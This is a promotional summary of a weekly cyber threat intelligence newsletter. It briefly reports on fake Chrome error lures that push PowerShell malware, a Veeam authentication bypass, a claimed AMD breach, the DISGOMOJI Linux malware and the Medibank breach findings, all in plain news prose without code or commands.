Volume 2, Issue no. 25 is out and in the latest weekly AUCloud Cyber Threat Intelligence Report we reveal:
Fake Google Chrome errors trick you into running malicious PowerShell scripts
A new cyber security threat involves cybercriminals deploying fake error messages that mimic Google Chrome, Microsoft Word, and OneDrive alerts. These messages deceive users into executing malicious PowerShell scripts, claiming to fix the supposed issues, but instead, install malware on the users system. This tactic uses social engineering to exploit trust in familiar software error prompts, leading users to inadvertently compromise their own devices.
Exploit for Veeam Recovery Orchestrator auth bypass available, patch now
A critical vulnerability in Veeam Recovery Orchestrator, identified as CVE-2024-29855, allows unauthorised administrative access due to a hardcoded JSON Web Token (JWT) secret. This exploit enables attackers to bypass authentication effortlessly, posing a significant risk to affected systems. Security researcher Sina Kheirkhah, who disclosed the vulnerability, demonstrated that it’s simpler to exploit than initially described by Veeam.
AMD Investigates data breach claims by RansomHouse
AMD, one of the leading semiconductor companies, is currently investigating a significant data breach claimed by the cyber extortion group RansomHouse. The attackers allege they have stolen 450 GB of sensitive data, including network files, system information, and passwords. This incident underscores the critical importance of robust cyber security measures and highlights vulnerabilities in even the most advanced tech companies.
New Linux malware uses emojis sent via Discord
A new Linux malware, dubbed ‘DISGOMOJI,’ uses emojis sent through Discord for command and control (C2). This novel approach was discovered by Volexity, a cyber security firm that identified a Pakistan-based threat actor, UTA0137, targeting Indian government agencies. The malware’s reliance on emojis for executing commands helps it bypass traditional security measures.
Who was to blame? Further updates on the infamous Medibank Private hack
Recent investigations have revealed critical security oversights leading to the Medibank Private data breach. Key findings include missed Endpoint Detection and Response (EDR) alerts, inadequate multi-factor authentication (MFA), and delayed response times. These lapses allowed hackers to exploit stolen credentials, leading to the compromise of personal data for 9.7 million individuals. The Australian Information Commissioner (AIC) has detailed these failures in a court filing, highlighting Medibank’s insufficient investment in cyber security measures.
Access to the full report and automatically subscribe for future editions.
